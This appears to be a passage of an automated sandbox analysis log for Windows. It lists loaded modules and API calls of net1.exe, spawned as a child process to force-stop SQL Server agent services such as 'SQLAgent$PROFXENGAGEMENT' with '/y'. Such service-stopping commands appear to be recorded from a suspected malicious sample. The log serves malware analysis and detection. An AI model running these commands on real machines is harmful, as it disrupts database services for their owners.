0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10138 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10154 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10155 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10156 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10157 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10158 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10159 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10160 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10161 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10162 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10163 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10164 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10165 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10166 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10167 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10168 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10169 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10170 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10171 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10172 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10173 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10174 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10175 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10176 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10200 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 769 os_tid = 0xc34 [0111.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fe10 | out: lpSystemTimeAsFileTime=0x20fe10*(dwLowDateTime=0xf76584b0, dwHighDateTime=0x1d48689)) [0111.147] GetCurrentProcessId () returned 0x113c [0111.147] GetCurrentThreadId () returned 0xc34 [0111.147] GetTickCount () returned 0x257ee [0111.147] QueryPerformanceCounter (in: lpPerformanceCount=0x20fe18 | out: lpPerformanceCount=0x20fe18*=1815806500000) returned 1 [0111.149] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.166] __set_app_type (_Type=0x1) [0111.166] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.166] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.166] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.166] GetConsoleOutputCP () returned 0x1b5 [0111.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.166] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.168] sprintf_s (in: _DstBuf=0x20fdb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.168] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.170] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.170] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.170] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" [0111.170] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fb50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.170] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.170] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fda8 | out: Buffer=0x20fda8*=0x364d60) returned 0x0 [0111.170] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fda8 | out: Buffer=0x20fda8*=0x36c130) returned 0x0 [0111.170] _fileno (_File=0x7fefdba2a80) returned 0 [0111.171] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.171] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.171] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.171] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.171] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.171] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.171] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.171] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.171] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.171] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.171] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.171] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.171] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.171] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.171] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.171] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.171] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.171] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.171] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.171] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.171] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.171] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.171] _wcsicmp (_String1="accounts", _String2="SQLAgent$PRACTTICEMGT") returned -18 [0111.171] _wcsicmp (_String1="computer", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0111.172] _wcsicmp (_String1="config", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0111.172] _wcsicmp (_String1="continue", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0111.172] _wcsicmp (_String1="cont", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0111.172] _wcsicmp (_String1="file", _String2="SQLAgent$PRACTTICEMGT") returned -13 [0111.172] _wcsicmp (_String1="files", _String2="SQLAgent$PRACTTICEMGT") returned -13 [0111.172] _wcsicmp (_String1="group", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.172] _wcsicmp (_String1="groups", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.172] _wcsicmp (_String1="help", _String2="SQLAgent$PRACTTICEMGT") returned -11 [0111.172] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PRACTTICEMGT") returned -11 [0111.172] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0111.172] _wcsicmp (_String1="pause", _String2="SQLAgent$PRACTTICEMGT") returned -3 [0111.172] _wcsicmp (_String1="session", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.172] _wcsicmp (_String1="sessions", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.172] _wcsicmp (_String1="sess", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.172] _wcsicmp (_String1="share", _String2="SQLAgent$PRACTTICEMGT") returned -9 [0111.172] _wcsicmp (_String1="start", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0111.172] _wcsicmp (_String1="stats", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0111.172] _wcsicmp (_String1="statistics", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0111.172] _wcsicmp (_String1="stop", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0111.172] _wcsicmp (_String1="time", _String2="SQLAgent$PRACTTICEMGT") returned 1 [0111.172] _wcsicmp (_String1="user", _String2="SQLAgent$PRACTTICEMGT") returned 2 [0111.172] _wcsicmp (_String1="users", _String2="SQLAgent$PRACTTICEMGT") returned 2 [0111.172] _wcsicmp (_String1="msg", _String2="SQLAgent$PRACTTICEMGT") returned -6 [0111.172] _wcsicmp (_String1="messenger", _String2="SQLAgent$PRACTTICEMGT") returned -6 [0111.172] _wcsicmp (_String1="receiver", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0111.172] _wcsicmp (_String1="rcv", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0111.172] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PRACTTICEMGT") returned -5 [0111.172] _wcsicmp (_String1="redirector", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0111.172] _wcsicmp (_String1="redir", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0111.172] _wcsicmp (_String1="rdr", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0111.172] _wcsicmp (_String1="workstation", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0111.172] _wcsicmp (_String1="work", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0111.172] _wcsicmp (_String1="wksta", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0111.173] _wcsicmp (_String1="prdr", _String2="SQLAgent$PRACTTICEMGT") returned -3 [0111.173] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PRACTTICEMGT") returned -15 [0111.173] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0111.173] _wcsicmp (_String1="server", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0111.173] _wcsicmp (_String1="svr", _String2="SQLAgent$PRACTTICEMGT") returned 5 [0111.173] _wcsicmp (_String1="srv", _String2="SQLAgent$PRACTTICEMGT") returned 1 [0111.173] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0111.173] _wcsicmp (_String1="alerter", _String2="SQLAgent$PRACTTICEMGT") returned -18 [0111.173] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PRACTTICEMGT") returned -5 [0111.173] _wcsupr (in: _String="SQLAgent$PRACTTICEMGT" | out: _String="SQLAGENT$PRACTTICEMGT") returned="SQLAGENT$PRACTTICEMGT" [0111.173] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36ce40 [0111.177] GetServiceKeyNameW (in: hSCManager=0x36ce40, lpDisplayName="SQLAGENT$PRACTTICEMGT", lpServiceName=0xff725750, lpcchBuffer=0x20fcc8 | out: lpServiceName="", lpcchBuffer=0x20fcc8) returned 0 [0111.178] _wcsicmp (_String1="msg", _String2="SQLAGENT$PRACTTICEMGT") returned -6 [0111.178] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PRACTTICEMGT") returned -6 [0111.178] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0111.178] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0111.178] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0111.178] _wcsicmp (_String1="redir", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0111.178] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0111.178] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0111.178] _wcsicmp (_String1="work", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0111.178] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0111.178] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PRACTTICEMGT") returned -3 [0111.178] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PRACTTICEMGT") returned -15 [0111.178] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PRACTTICEMGT") returned -7 [0111.178] _wcsicmp (_String1="server", _String2="SQLAGENT$PRACTTICEMGT") returned -12 [0111.179] _wcsicmp (_String1="svr", _String2="SQLAGENT$PRACTTICEMGT") returned 5 [0111.179] _wcsicmp (_String1="srv", _String2="SQLAGENT$PRACTTICEMGT") returned 1 [0111.179] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PRACTTICEMGT") returned -7 [0111.179] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PRACTTICEMGT") returned -18 [0111.179] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PRACTTICEMGT") returned -5 [0111.179] NetServiceControl (in: servername=0x0, service="SQLAGENT$PRACTTICEMGT", opcode=0x0, arg=0x0, bufptr=0x20fcd0 | out: bufptr=0x20fcd0) returned 0x889 [0111.179] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.179] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0111.189] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.191] GetFileType (hFile=0xb) returned 0x2 [0111.191] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb98 | out: lpMode=0x20fb98) returned 1 [0111.191] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fb90, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x20fb90*=0x1e) returned 1 [0111.191] GetFileType (hFile=0xb) returned 0x2 [0111.192] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb98 | out: lpMode=0x20fb98) returned 1 [0111.192] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb90, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x20fb90*=0x2) returned 1 [0111.192] _ultow (in: _Dest=0x889, _Radix=2161664 | out: _Dest=0x889) returned="2185" [0111.192] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.192] GetFileType (hFile=0xb) returned 0x2 [0111.193] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb98 | out: lpMode=0x20fb98) returned 1 [0111.193] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fb90, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x20fb90*=0x34) returned 1 [0111.193] GetFileType (hFile=0xb) returned 0x2 [0111.193] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb98 | out: lpMode=0x20fb98) returned 1 [0111.194] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb90, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x20fb90*=0x2) returned 1 [0111.194] NetApiBufferFree (Buffer=0x364d60) returned 0x0 [0111.194] NetApiBufferFree (Buffer=0x36c130) returned 0x0 [0111.194] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" [0111.194] exit (_Code=2) Process: id = "278" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5a52d000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "273" os_parent_pid = "0x1074" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10139 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10140 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10141 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10142 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10143 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10144 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10145 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10146 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10147 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10148 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10149 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 10150 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10151 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 10152 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10153 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10177 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10178 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10179 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10180 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 10181 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 10182 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10183 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10184 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10185 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10186 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10187 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10188 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10189 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10190 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10191 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10192 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10193 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10194 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10195 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10196 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10197 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10198 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10199 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10201 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 770 os_tid = 0x1008 [0111.158] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa90 | out: lpSystemTimeAsFileTime=0x1afa90*(dwLowDateTime=0xf767e610, dwHighDateTime=0x1d48689)) [0111.158] GetCurrentProcessId () returned 0xdf0 [0111.158] GetCurrentThreadId () returned 0x1008 [0111.158] GetTickCount () returned 0x257fe [0111.158] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa98 | out: lpPerformanceCount=0x1afa98*=1815807600000) returned 1 [0111.160] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.160] __set_app_type (_Type=0x1) [0111.160] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.160] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.160] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.160] GetConsoleOutputCP () returned 0x1b5 [0111.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.195] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.197] sprintf_s (in: _DstBuf=0x1afa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.197] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.199] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.199] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROFXENGAGEMENT /y" 